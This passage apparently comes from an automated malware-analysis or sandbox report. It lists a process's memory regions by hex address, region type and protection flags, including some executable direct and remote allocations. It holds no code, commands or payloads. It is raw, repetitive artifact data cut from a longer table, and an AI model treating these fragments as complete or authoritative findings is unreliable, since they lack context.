page read and write
|
||
4BE000
|
stack
|
page read and write
|
||
374000
|
heap
|
page read and write
|
||
1C30000
|
heap
|
page read and write
|
||
1DAF000
|
stack
|
page read and write
|
||
3B0000
|
direct allocation
|
page read and write
|
||
3E7E000
|
heap
|
page read and write
|
||
686000
|
heap
|
page read and write
|
||
46BF000
|
heap
|
page read and write
|
||
2370000
|
heap
|
page read and write
|
||
56BA000
|
heap
|
page read and write
|
||
5180000
|
heap
|
page read and write
|
||
5D1E000
|
stack
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
56CC000
|
heap
|
page read and write
|
||
2D45000
|
trusted library allocation
|
page read and write
|
||
5620000
|
heap
|
page read and write
|
||
4C3000
|
heap
|
page read and write
|
||
3E7C000
|
heap
|
page read and write
|
||
379000
|
heap
|
page read and write
|
||
579000
|
heap
|
page read and write
|
||
46B9000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
7FE8B180000
|
trusted library allocation
|
page read and write
|
||
CED000
|
stack
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
7FFFFF84000
|
trusted library allocation
|
page readonly
|
||
22D22000
|
heap
|
page read and write
|
||
393000
|
heap
|
page read and write
|
||
2620000
|
heap
|
page execute and read and write
|
||
236A000
|
heap
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
1ABCA000
|
heap
|
page read and write
|
||
579000
|
heap
|
page read and write
|
||
381000
|
heap
|
page read and write
|
||
883000
|
heap
|
page read and write
|
||
A0B2000
|
direct allocation
|
page execute and read and write
|
||
22680000
|
heap
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
167000
|
stack
|
page read and write
|
||
24C0000
|
trusted library allocation
|
page execute and read and write
|
||
3DA6000
|
heap
|
page read and write
|
||
41F000
|
system
|
page execute and read and write
|
||
436A000
|
stack
|
page read and write
|
||
3B5A000
|
trusted library allocation
|
page read and write
|
||
54F6000
|
heap
|
page read and write
|
||
18F000
|
direct allocation
|
page read and write
|
||
4859000
|
heap
|
page read and write
|
||
8B5000
|
heap
|
page read and write
|
||
49FB000
|
trusted library allocation
|
page read and write
|
||
A0E2000
|
direct allocation
|
page execute and read and write
|
||
6A7000
|
heap
|
page read and write
|
||
2475000
|
trusted library allocation
|
page read and write
|
||
1B85B000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
4828000
|
heap
|
page read and write
|
||
55B5000
|
heap
|
page read and write
|
||
9E0000
|
heap
|
page read and write
|
||
7FE8AF90000
|
trusted library allocation
|
page execute and read and write
|
||
327F000
|
trusted library allocation
|
page read and write
|
||
56BA000
|
heap
|
page read and write
|
||
922000
|
trusted library allocation
|
page read and write
|
||
A08E000
|
direct allocation
|
page execute and read and write
|
||
3E76000
|
heap
|
page read and write
|
||
3E7E000
|
heap
|
page read and write
|
||
4EF000
|
stack
|
page read and write
|
||
4854000
|
heap
|
page read and write
|
||
A0E6000
|
direct allocation
|
page execute and read and write
|
||
48D6000
|
heap
|
page read and write
|
||
1A9B0000
|
heap
|
page read and write
|
||
6FE000
|
heap
|
page read and write
|
||
3363000
|
heap
|
page read and write
|
||
49A000
|
heap
|
page read and write
|
||
484000
|
heap
|
page read and write
|
||
7FE898F0000
|
trusted library allocation
|
page read and write
|
||
597000
|
heap
|
page read and write
|
||
686000
|
heap
|
page read and write
|
||
507000
|
heap
|
page read and write
|
||
5B4000
|
heap
|
page read and write
|
||
283E000
|
stack
|
page read and write
|
||
519B000
|
heap
|
page read and write
|
||
2227000
|
heap
|
page read and write
|
||
2661000
|
trusted library allocation
|
page read and write
|
||
2519000
|
trusted library allocation
|
page read and write
|
||
29B5000
|
trusted library allocation
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
FDC000
|
trusted library allocation
|
page read and write
|
||
570000
|
heap
|
page read and write
|
||
3A0000
|
heap
|
page read and write
|
||
7FE8B100000
|
trusted library allocation
|
page read and write
|
||
3E5C000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
3283000
|
trusted library allocation
|
page read and write
|
||
381000
|
heap
|
page read and write
|
||
33DB000
|
heap
|
page read and write
|
||
4FBE000
|
stack
|
page read and write
|
||
2520000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
6FF000
|
heap
|
page read and write
|
||
5FFE000
|
stack
|
page read and write
|
||
2F6F000
|
trusted library allocation
|
page read and write
|
||
A060000
|
direct allocation
|
page execute and read and write
|
||
2775000
|
heap
|
page read and write
|
||
51D000
|
heap
|
page read and write
|
||
A012000
|
direct allocation
|
page execute and read and write
|
||
1C020000
|
heap
|
page read and write
|
||
27F000
|
stack
|
page read and write
|
||
569D000
|
heap
|
page read and write
|
||
61C3000
|
heap
|
page read and write
|
||
3C87000
|
trusted library allocation
|
page read and write
|
||
1C48A000
|
heap
|
page read and write
|
||
7088000
|
direct allocation
|
page execute and read and write
|
||
4B80000
|
trusted library allocation
|
page read and write
|
||
3AA0000
|
trusted library allocation
|
page read and write
|
||
5B5000
|
heap
|
page read and write
|
||
677000
|
heap
|
page read and write
|
||
1AF0F000
|
stack
|
page read and write
|
||
3E11000
|
heap
|
page read and write
|
||
31F000
|
heap
|
page read and write
|
||
1CA2000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
350000
|
direct allocation
|
page read and write
|
||
3E67000
|
heap
|
page read and write
|
||
1C32E000
|
heap
|
page read and write
|
||
A0E0000
|
direct allocation
|
page execute and read and write
|
||
1A3000
|
trusted library allocation
|
page read and write
|
||
4661000
|
heap
|
page read and write
|
||
7A88000
|
direct allocation
|
page execute and read and write
|
||
4860000
|
heap
|
page read and write
|
||
5A7000
|
heap
|
page read and write
|
||
308000
|
heap
|
page read and write
|
||
3661000
|
trusted library allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
631000
|
heap
|
page read and write
|
||
35C9000
|
trusted library allocation
|
page read and write
|
||
2F7000
|
heap
|
page read and write
|
||
54F0000
|
heap
|
page read and write
|
||
4CA000
|
heap
|
page read and write
|
||
1C410000
|
heap
|
page read and write
|
||
7FE8B0E0000
|
trusted library allocation
|
page read and write
|
||
5CC4000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
465000
|
heap
|
page read and write
|
||
2840000
|
trusted library allocation
|
page read and write
|
||
F70000
|
trusted library allocation
|
page read and write
|
||
1C05B000
|
heap
|
page read and write
|
||
4DCE000
|
stack
|
page read and write | page guard
|
||
1DF0000
|
heap
|
page read and write
|
||
B60000
|
trusted library allocation
|
page read and write
|
||
267D000
|
stack
|
page read and write
|
||
490000
|
heap
|
page read and write
|
||
27F0000
|
trusted library allocation
|
page read and write
|
||
634000
|
heap
|
page read and write
|
||
1B825000
|
heap
|
page read and write
|
||
222BE000
|
stack
|
page read and write
|
||
391000
|
heap
|
page read and write
|
||
4B0000
|
heap
|
page read and write
|
||
210F000
|
stack
|
page read and write
|
||
F40000
|
trusted library allocation
|
page read and write
|
||
4AA000
|
heap
|
page read and write
|
||
E20000
|
trusted library allocation
|
page read and write
|
||
5869000
|
heap
|
page read and write
|
||
330000
|
heap
|
page read and write
|
||
1D5000
|
trusted library allocation
|
page execute and read and write
|
||
597000
|
heap
|
page read and write
|
||
363000
|
heap
|
page read and write
|
||
469A000
|
heap
|
page read and write
|
||
18C000
|
stack
|
page read and write
|
||
1C4D000
|
heap
|
page read and write
|
||
360000
|
heap
|
page execute and read and write
|
||
18B000
|
stack
|
page read and write
|
||
460000
|
heap
|
page read and write
|
||
3E11000
|
heap
|
page read and write
|
||
1DAC000
|
heap
|
page read and write
|
||
9FF3000
|
direct allocation
|
page execute and read and write
|
||
4856000
|
heap
|
page read and write
|
||
579000
|
heap
|
page read and write
|
||
5D3A000
|
heap
|
page read and write
|
||
1B790000
|
heap
|
page read and write
|
||
3AF000
|
direct allocation
|
page read and write
|
||
56BD000
|
heap
|
page read and write
|
||
43E0000
|
trusted library allocation
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
9A0000
|
direct allocation
|
page read and write
|
||
25AF000
|
stack
|
page read and write
|
||
904000
|
heap
|
page read and write
|
||
54F7000
|
heap
|
page read and write
|
||
3580000
|
trusted library allocation
|
page read and write
|
||
35F000
|
heap
|
page read and write
|
||
400000
|
heap
|
page read and write
|
||
7FFFFF83000
|
trusted library allocation
|
page execute read
|
||
1A6B0000
|
heap
|
page read and write
|
||
18C000
|
stack
|
page read and write
|
||
7FE895F0000
|
trusted library allocation
|
page read and write
|
||
568B000
|
heap
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
448E000
|
stack
|
page read and write
|
||
1AA4E000
|
heap
|
page read and write
|
||
56B5000
|
heap
|
page read and write
|
||
24A0000
|
heap
|
page read and write
|
||
47E3000
|
heap
|
page read and write
|
||
9FEB000
|
direct allocation
|
page execute and read and write
|
||
3BB0000
|
trusted library allocation
|
page read and write
|
||
2BA3000
|
trusted library allocation
|
page read and write
|
||
1CB1000
|
heap
|
page read and write
|
||
25FF000
|
stack
|
page read and write
|
||
240000
|
heap
|
page read and write
|
||
2143000
|
heap
|
page read and write
|
||
7FE89934000
|
trusted library allocation
|
page read and write
|
||
7FE897C0000
|
trusted library allocation
|
page execute and read and write
|
||
611000
|
heap
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
A096000
|
direct allocation
|
page execute and read and write
|
||
593000
|
heap
|
page read and write
|
||
4A7C000
|
heap
|
page read and write
|
||
5D2E000
|
heap
|
page read and write
|
||
56EC000
|
heap
|
page read and write
|
||
2500000
|
trusted library allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
1A63A000
|
stack
|
page read and write
|
||
517000
|
heap
|
page read and write
|
||
6129000
|
heap
|
page read and write
|
||
381000
|
heap
|
page read and write
|
||
A05E000
|
direct allocation
|
page execute and read and write
|
||
1D0000
|
heap
|
page read and write
|
||
BAE000
|
stack
|
page read and write
|
||
E50000
|
direct allocation
|
page read and write
|
||
6D8000
|
heap
|
page read and write
|
||
58B6000
|
heap
|
page read and write
|
||
5C5000
|
heap
|
page read and write
|
||
4B0000
|
heap
|
page read and write
|
||
1ABCE000
|
heap
|
page read and write
|
||
5869000
|
heap
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
A081000
|
direct allocation
|
page execute and read and write
|
||
42E000
|
heap
|
page read and write
|
||
41B000
|
system
|
page execute and read and write
|
||
3B5000
|
heap
|
page read and write
|
||
379000
|
heap
|
page read and write
|
||
3BB0000
|
trusted library allocation
|
page read and write
|
||
39A000
|
heap
|
page read and write
|
||
48E000
|
heap
|
page read and write
|
||
1247C000
|
trusted library allocation
|
page read and write
|
||
7FE898E0000
|
trusted library allocation
|
page read and write
|
||
3BC0000
|
trusted library allocation
|
page read and write
|
||
5BC0000
|
heap
|
page read and write
|
||
1AA0C000
|
heap
|
page read and write
|
||
1EE6000
|
heap
|
page read and write
|
||
46AC000
|
heap
|
page read and write
|
||
A0A5000
|
direct allocation
|
page execute and read and write
|
||
A09C000
|
direct allocation
|
page execute and read and write
|
||
367F000
|
stack
|
page read and write
|
||
A040000
|
direct allocation
|
page execute and read and write
|
||
24AF000
|
stack
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
A0AB000
|
direct allocation
|
page execute and read and write
|
||
1C286000
|
heap
|
page read and write
|
||
681000
|
heap
|
page read and write
|
||
270000
|
heap
|
page read and write
|
||
36CD000
|
trusted library allocation
|
page read and write
|
||
A038000
|
direct allocation
|
page execute and read and write
|
||
3419000
|
heap
|
page read and write
|
||
579000
|
heap
|
page read and write
|
||
6055000
|
heap
|
page read and write
|
||
21CB000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
900000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
6026000
|
heap
|
page read and write
|
||
3B0000
|
heap
|
page read and write
|
||
373000
|
heap
|
page read and write
|
||
A0B0000
|
direct allocation
|
page execute and read and write
|
||
3EE000
|
stack
|
page read and write
|
||
51D3000
|
heap
|
page read and write
|
||
320000
|
heap
|
page execute and read and write
|
||
193000
|
trusted library allocation
|
page execute and read and write
|
||
948000
|
trusted library allocation
|
page read and write
|
||
32D0000
|
trusted library allocation
|
page read and write
|
||
5BEF000
|
heap
|
page read and write
|
||
7FE898ED000
|
trusted library allocation
|
page read and write
|
||
260000
|
heap
|
page read and write
|
||
379000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
3E71000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
48A000
|
heap
|
page read and write
|
||
3E60000
|
heap
|
page read and write
|
||
A120000
|
direct allocation
|
page execute and read and write
|
||
2D0000
|
heap
|
page read and write
|
||
1D60000
|
heap
|
page read and write
|
||
7FE895D2000
|
trusted library allocation
|
page read and write
|
||
2D37000
|
trusted library allocation
|
page read and write
|
||
41B000
|
system
|
page execute and read and write
|
||
21EA000
|
heap
|
page read and write
|
||
3C9F000
|
trusted library allocation
|
page read and write
|
||
33DF000
|
heap
|
page read and write
|
||
21CC5000
|
heap
|
page read and write
|
||
579000
|
heap
|
page read and write
|
||
65F000
|
heap
|
page read and write
|
||
5678000
|
remote allocation
|
page execute and read and write
|
||
9DD000
|
stack
|
page read and write
|
||
4A9F000
|
stack
|
page read and write
|
||
5578000
|
heap
|
page read and write
|
||
528E000
|
stack
|
page read and write | page guard
|
||
569D000
|
heap
|
page read and write
|
||
1F50000
|
heap
|
page read and write
|
||
494000
|
heap
|
page read and write
|
||
41B000
|
system
|
page execute and read and write
|
||
56C0000
|
heap
|
page read and write
|
||
39E000
|
heap
|
page read and write
|
||
2700000
|
heap
|
page read and write
|
||
349000
|
heap
|
page read and write
|
||
2165000
|
heap
|
page read and write
|
||
408000
|
heap
|
page read and write
|
||
F80000
|
trusted library allocation
|
page read and write
|
||
A0DE000
|
direct allocation
|
page execute and read and write
|
||
2520000
|
heap
|
page read and write
|
||
631000
|
heap
|
page read and write
|
||
267F000
|
stack
|
page read and write
|
||
24EF000
|
stack
|
page read and write
|
||
3949000
|
trusted library allocation
|
page read and write
|
||
33FF000
|
heap
|
page read and write
|
||
8D000
|
stack
|
page read and write
|
||
2F0000
|
trusted library allocation
|
page read and write
|
||
373000
|
heap
|
page read and write
|
||
958000
|
trusted library allocation
|
page read and write
|
||
5C65000
|
heap
|
page read and write
|
||
1C54A000
|
heap
|
page read and write
|
||
140000
|
trusted library allocation
|
page read and write
|
||
4F20000
|
heap
|
page read and write
|
||
8E88000
|
direct allocation
|
page execute and read and write
|
||
46BF000
|
heap
|
page read and write
|
||
47E3000
|
heap
|
page read and write
|
||
349000
|
heap
|
page read and write
|
||
558000
|
heap
|
page read and write
|
||
1A0000
|
trusted library allocation
|
page read and write
|
||
67A000
|
heap
|
page read and write
|
||
3E6B000
|
heap
|
page read and write
|
||
2530000
|
heap
|
page read and write
|
||
7FE8AE80000
|
trusted library allocation
|
page read and write
|
||
568B000
|
heap
|
page read and write
|
||
585A000
|
heap
|
page read and write
|
||
29FE000
|
stack
|
page read and write
|
||
46FD000
|
heap
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
590000
|
heap
|
page read and write
|
||
2840000
|
trusted library allocation
|
page read and write
|
||
E70000
|
trusted library allocation
|
page read and write
|
||
1CB6000
|
heap
|
page read and write
|
||
267E000
|
trusted library allocation
|
page read and write
|
||
A0B7000
|
direct allocation
|
page execute and read and write
|
||
A096000
|
direct allocation
|
page execute and read and write
|
||
24EE000
|
stack
|
page read and write
|
||
BB0000
|
trusted library allocation
|
page read and write
|
||
4F00000
|
heap
|
page read and write
|
||
DE0000
|
direct allocation
|
page read and write
|
||
2587000
|
trusted library allocation
|
page read and write
|
||
813000
|
trusted library allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
6BF000
|
heap
|
page read and write
|
||
D70000
|
trusted library allocation
|
page read and write
|
||
2D9000
|
trusted library allocation
|
page read and write
|
||
354000
|
heap
|
page read and write
|
||
27AF000
|
stack
|
page read and write
|
||
2A54000
|
heap
|
page read and write
|
||
7FE895EB000
|
trusted library allocation
|
page read and write
|
||
56AD000
|
heap
|
page read and write
|
||
447000
|
heap
|
page read and write
|
||
35F000
|
heap
|
page read and write
|
||
459000
|
unkown
|
page read and write
|
||
240000
|
trusted library allocation
|
page read and write
|
||
A10000
|
heap
|
page read and write
|
||
2500000
|
trusted library allocation
|
page read and write
|
||
5F9000
|
heap
|
page read and write
|
||
2940000
|
trusted library allocation
|
page read and write
|
||
393000
|
heap
|
page read and write
|
||
56B7000
|
heap
|
page read and write
|
||
27F0000
|
trusted library allocation
|
page read and write
|
||
7FE8B150000
|
trusted library allocation
|
page read and write
|
||
5866000
|
heap
|
page read and write
|
||
2A01000
|
trusted library allocation
|
page read and write
|
||
2163000
|
heap
|
page read and write
|
||
167000
|
stack
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
A07B000
|
direct allocation
|
page execute and read and write
|
||
585D000
|
heap
|
page read and write
|
||
273F000
|
stack
|
page read and write
|
||
E90000
|
trusted library allocation
|
page read and write
|
||
28D000
|
heap
|
page read and write
|
||
1E14000
|
heap
|
page read and write
|
||
3D8000
|
heap
|
page read and write
|
||
11B000
|
stack
|
page read and write
|
||
47DE000
|
stack
|
page read and write
|
||
43E000
|
heap
|
page read and write
|
||
A073000
|
direct allocation
|
page execute and read and write
|
||
D60000
|
trusted library allocation
|
page read and write
|
||
8D000
|
stack
|
page read and write
|
||
5D16000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
327E000
|
trusted library allocation
|
page read and write
|
||
5D0E000
|
stack
|
page read and write
|
||
18A000
|
trusted library allocation
|
page execute and read and write
|
||
32B1000
|
trusted library allocation
|
page read and write
|
||
2115000
|
heap
|
page read and write
|
||
7FE89939000
|
trusted library allocation
|
page read and write
|
||
5869000
|
heap
|
page read and write
|
||
1E57000
|
direct allocation
|
page read and write
|
||
336F000
|
heap
|
page read and write
|
||
484F000
|
heap
|
page read and write
|
||
55C000
|
heap
|
page read and write
|
||
362000
|
heap
|
page read and write
|
||
1F50000
|
heap
|
page read and write
|
||
BC0000
|
trusted library allocation
|
page read and write
|
||
659000
|
heap
|
page read and write
|
||
740000
|
heap
|
page read and write
|
||
5CE7000
|
heap
|
page read and write
|
||
8D0000
|
heap
|
page execute and read and write
|
||
50CE000
|
stack
|
page read and write
|
||
1DE9000
|
heap
|
page read and write
|
||
26FF000
|
stack
|
page read and write
|
||
8D000
|
stack
|
page read and write
|
||
4F3F000
|
stack
|
page read and write
|
||
1B4CB000
|
stack
|
page read and write
|
||
4B0000
|
trusted library section
|
page read and write
|
||
D30000
|
trusted library allocation
|
page read and write
|
||
4A35000
|
heap
|
page read and write
|
||
497E000
|
stack
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
66D000
|
heap
|
page read and write
|
||
35F000
|
heap
|
page read and write
|
||
26AF000
|
stack
|
page read and write
|
||
5BBC000
|
heap
|
page read and write
|
||
D80000
|
trusted library allocation
|
page read and write
|
||
7FE8B165000
|
trusted library allocation
|
page read and write
|
||
6170000
|
heap
|
page read and write
|
||
5CD5000
|
stack
|
page read and write
|
||
A033000
|
direct allocation
|
page execute and read and write
|
||
E10000
|
trusted library allocation
|
page read and write
|
||
9B9000
|
heap
|
page read and write
|
||
5A0000
|
heap
|
page read and write
|
||
840000
|
direct allocation
|
page read and write
|
||
DE0000
|
direct allocation
|
page read and write
|
||
415000
|
heap
|
page read and write
|
||
4D3000
|
direct allocation
|
page read and write
|
||
17F000
|
stack
|
page read and write
|
||
3E63000
|
heap
|
page read and write
|
||
A083000
|
direct allocation
|
page execute and read and write
|
||
A0F7000
|
direct allocation
|
page execute and read and write
|
||
E20000
|
heap
|
page execute and read and write
|
||
60A8000
|
heap
|
page read and write
|
||
4C0000
|
direct allocation
|
page read and write
|
||
180000
|
trusted library allocation
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
D5D000
|
stack
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
D7E000
|
stack
|
page read and write
|
||
518000
|
heap
|
page read and write
|
||
1AA000
|
trusted library allocation
|
page read and write
|
||
7FE8B0B0000
|
trusted library allocation
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
328B000
|
trusted library allocation
|
page read and write
|
||
2A0D000
|
trusted library allocation
|
page read and write
|
||
7FE8AE73000
|
trusted library allocation
|
page execute and read and write
|
||
35D000
|
heap
|
page read and write
|
||
38AF000
|
trusted library allocation
|
page read and write
|
||
5C1E000
|
heap
|
page read and write
|
||
221A000
|
heap
|
page read and write
|
||
7FE89940000
|
trusted library allocation
|
page read and write
|
||
435000
|
unkown
|
page read and write
|
||
340C000
|
heap
|
page read and write
|
||
459000
|
unkown
|
page read and write
|
||
1B310000
|
heap
|
page read and write
|
||
277000
|
stack
|
page read and write
|
||
3B5000
|
heap
|
page read and write
|
||
4707000
|
heap
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
46F000
|
unkown
|
page readonly
|
||
5544000
|
heap
|
page read and write
|
||
2C06000
|
trusted library allocation
|
page read and write
|
||
22CF8000
|
heap
|
page read and write
|
||
4703000
|
heap
|
page read and write
|
||
3419000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
AF0000
|
trusted library allocation
|
page read and write
|
||
4C30000
|
trusted library allocation
|
page execute and read and write
|
||
60BF000
|
heap
|
page read and write
|
||
533D000
|
stack
|
page read and write
|
||
579000
|
heap
|
page read and write
|
||
381000
|
heap
|
page read and write
|
||
2600000
|
trusted library allocation
|
page execute and read and write
|
||
3900000
|
trusted library allocation
|
page read and write
|
||
2836000
|
trusted library allocation
|
page read and write
|
||
1E4F000
|
stack
|
page read and write
|
||
12501000
|
trusted library allocation
|
page read and write
|
||
6FB000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
343000
|
heap
|
page read and write
|
||
223F000
|
stack
|
page read and write
|
||
820000
|
direct allocation
|
page read and write
|
||
910000
|
trusted library allocation
|
page read and write
|
||
58BF000
|
heap
|
page read and write
|
||
381000
|
heap
|
page read and write
|
||
4824000
|
heap
|
page read and write
|
||
35FD000
|
trusted library allocation
|
page read and write
|
||
1F20000
|
heap
|
page read and write
|
||
A08C000
|
direct allocation
|
page execute and read and write
|
||
2313000
|
trusted library allocation
|
page read and write
|
||
860000
|
trusted library allocation
|
page read and write
|
||
A09E000
|
direct allocation
|
page execute and read and write
|
||
400000
|
system
|
page execute and read and write
|
||
1C680000
|
heap
|
page read and write
|
||
422000
|
unkown
|
page read and write
|
||
8D000
|
stack
|
page read and write
|
||
9E8000
|
heap
|
page read and write
|
||
9F0000
|
heap
|
page read and write
|
||
46FE000
|
heap
|
page read and write
|
||
5C36000
|
heap
|
page read and write
|
||
FD0000
|
trusted library allocation
|
page read and write
|
||
D01000
|
trusted library allocation
|
page read and write
|
||
23C000
|
stack
|
page read and write
|
||
7FFFFF85000
|
trusted library allocation
|
page execute read
|
||
680000
|
trusted library allocation
|
page read and write
|
||
A005000
|
direct allocation
|
page execute and read and write
|
||
340000
|
heap
|
page read and write
|
||
2A0000
|
trusted library allocation
|
page execute and read and write
|
||
377000
|
heap
|
page read and write
|
||
1CC20000
|
heap
|
page read and write
|
||
2366000
|
heap
|
page read and write
|
||
56C0000
|
heap
|
page read and write
|
||
9FFD000
|
direct allocation
|
page execute and read and write
|
||
2D0000
|
trusted library allocation
|
page read and write
|
||
A10C000
|
direct allocation
|
page execute and read and write
|
||
179000
|
heap
|
page read and write
|
||
24FF000
|
stack
|
page read and write
|
||
9FE9000
|
direct allocation
|
page execute and read and write
|
||
5550000
|
heap
|
page read and write
|
||
274000
|
heap
|
page read and write
|
||
267000
|
heap
|
page read and write
|
||
3DDE000
|
heap
|
page read and write
|
||
6EC000
|
heap
|
page read and write
|
||
66C000
|
heap
|
page read and write
|
||
A11E000
|
direct allocation
|
page execute and read and write
|
||
8C000
|
stack
|
page read and write
|
||
7FE8B0D0000
|
trusted library allocation
|
page read and write
|
||
46FD000
|
heap
|
page read and write
|
||
3CE000
|
heap
|
page read and write
|
||
48D0000
|
trusted library allocation
|
page read and write
|
||
2D0000
|
direct allocation
|
page read and write
|
||
4707000
|
heap
|
page read and write
|
||
3E3B000
|
heap
|
page read and write
|
||
A035000
|
direct allocation
|
page execute and read and write
|
||
3278000
|
trusted library allocation
|
page read and write
|
||
3D9C000
|
heap
|
page read and write
|
||
3420000
|
trusted library allocation
|
page read and write
|
||
579000
|
heap
|
page read and write
|
||
66E000
|
heap
|
page read and write
|
||
3C70000
|
trusted library allocation
|
page read and write
|
||
4854000
|
heap
|
page read and write
|
||
619F000
|
heap
|
page read and write
|
||
38C0000
|
trusted library allocation
|
page read and write
|
||
67F000
|
heap
|
page read and write
|
||
7FE897D8000
|
trusted library allocation
|
page read and write
|
||
18C000
|
stack
|
page read and write
|
||
435000
|
heap
|
page read and write
|
||
35A000
|
heap
|
page read and write
|
||
A0D8000
|
direct allocation
|
page execute and read and write
|
||
234F000
|
stack
|
page read and write
|
||
7FE8B110000
|
trusted library allocation
|
page read and write
|
||
2450000
|
trusted library allocation
|
page read and write
|
||
64E000
|
heap
|
page read and write
|
||
1A978000
|
stack
|
page read and write
|
||
FD0000
|
trusted library allocation
|
page execute and read and write
|
||
391000
|
heap
|
page read and write
|
||
1E0000
|
heap
|
page read and write
|
||
7FE8B170000
|
trusted library allocation
|
page read and write
|
||
2470000
|
trusted library allocation
|
page read and write
|
||
4FFF000
|
heap
|
page read and write
|
||
5CF3000
|
heap
|
page read and write
|
||
4858000
|
heap
|
page read and write
|
||
292000
|
heap
|
page read and write
|
||
554B000
|
heap
|
page read and write
|
||
27F000
|
stack
|
page read and write
|
||
486000
|
heap
|
page read and write
|
||
1CB1000
|
heap
|
page read and write
|
||
46F6000
|
heap
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
681000
|
heap
|
page read and write
|
||
2900000
|
heap
|
page read and write
|
||
671000
|
heap
|
page read and write
|
||
1AA06000
|
heap
|
page read and write
|
||
A0C7000
|
direct allocation
|
page execute and read and write
|
||
7FFFFF20000
|
trusted library allocation
|
page execute and read and write
|
||
46F000
|
unkown
|
page readonly
|
||
60FE000
|
stack
|
page read and write
|
||
49F3000
|
trusted library allocation
|
page read and write
|
||
2588000
|
trusted library allocation
|
page read and write
|
||
8CA000
|
trusted library allocation
|
page read and write
|
||
50DE000
|
stack
|
page read and write
|
||
48DD000
|
heap
|
page read and write
|
||
328A000
|
trusted library allocation
|
page read and write
|
||
3414000
|
heap
|
page read and write
|
||
80D000
|
trusted library allocation
|
page execute and read and write
|
||
22E7000
|
heap
|
page read and write
|
||
46B9000
|
heap
|
page read and write
|
||
34E000
|
stack
|
page read and write
|
||
4BF000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
370000
|
heap
|
page read and write
|
||
42F000
|
unkown
|
page read and write
|
||
557000
|
heap
|
page read and write
|
||
CB0000
|
trusted library allocation
|
page read and write
|
||
3490000
|
trusted library allocation
|
page read and write
|
||
3DBC000
|
heap
|
page read and write
|
||
6AF000
|
heap
|
page read and write
|
||
3DBC000
|
heap
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
3A9000
|
heap
|
page read and write
|
||
980000
|
direct allocation
|
page read and write
|
||
12678000
|
trusted library allocation
|
page read and write
|
||
A04A000
|
direct allocation
|
page execute and read and write
|
||
1AA78000
|
heap
|
page read and write
|
||
440000
|
heap
|
page read and write
|
||
7FFFFF85000
|
trusted library allocation
|
page execute read
|
||
216A000
|
heap
|
page read and write
|
||
497E000
|
stack
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
36D000
|
heap
|
page read and write
|
||
4F5A000
|
heap
|
page read and write
|
||
2700000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
310000
|
heap
|
page read and write
|
||
501000
|
heap
|
page read and write
|
||
49AD000
|
stack
|
page read and write
|
||
2CB0000
|
heap
|
page read and write
|
||
7FE8B0C0000
|
trusted library allocation
|
page read and write
|
||
7FE8B230000
|
trusted library allocation
|
page read and write
|
||
37D000
|
heap
|
page read and write
|
||
3590000
|
trusted library allocation
|
page read and write
|
||
3BB0000
|
trusted library allocation
|
page read and write
|
||
4859000
|
heap
|
page read and write
|
||
383000
|
heap
|
page read and write
|
||
1DEB000
|
heap
|
page read and write
|
||
5540000
|
heap
|
page read and write
|
||
2451000
|
trusted library allocation
|
page read and write
|
||
30B0000
|
trusted library allocation
|
page execute
|
||
3E2B000
|
heap
|
page read and write
|
||
2276000
|
heap
|
page read and write
|
||
1D2000
|
trusted library allocation
|
page read and write
|
||
2D0000
|
trusted library allocation
|
page read and write
|
||
3E0F000
|
heap
|
page read and write
|
||
1AB4E000
|
stack
|
page read and write
|
||
A07F000
|
direct allocation
|
page execute and read and write
|
||
3480000
|
heap
|
page read and write
|
||
579000
|
heap
|
page read and write
|
||
430000
|
trusted library allocation
|
page read and write
|
||
52C0000
|
heap
|
page read and write
|
||
A001000
|
direct allocation
|
page execute and read and write
|
||
4A82000
|
trusted library allocation
|
page read and write
|
||
607000
|
heap
|
page read and write
|
||
56C0000
|
heap
|
page read and write
|
||
3C7000
|
heap
|
page read and write
|
||
240000
|
heap
|
page read and write
|
||
3E4000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
20000
|
heap
|
page read and write
|
||
33FF000
|
heap
|
page read and write
|
||
2D3D000
|
trusted library allocation
|
page read and write
|
||
330000
|
trusted library allocation
|
page read and write
|
||
2A20000
|
trusted library allocation
|
page execute read
|
||
1A983000
|
heap
|
page read and write
|
||
56B0000
|
heap
|
page read and write
|
||
1A6C8000
|
stack
|
page read and write
|
||
24AE000
|
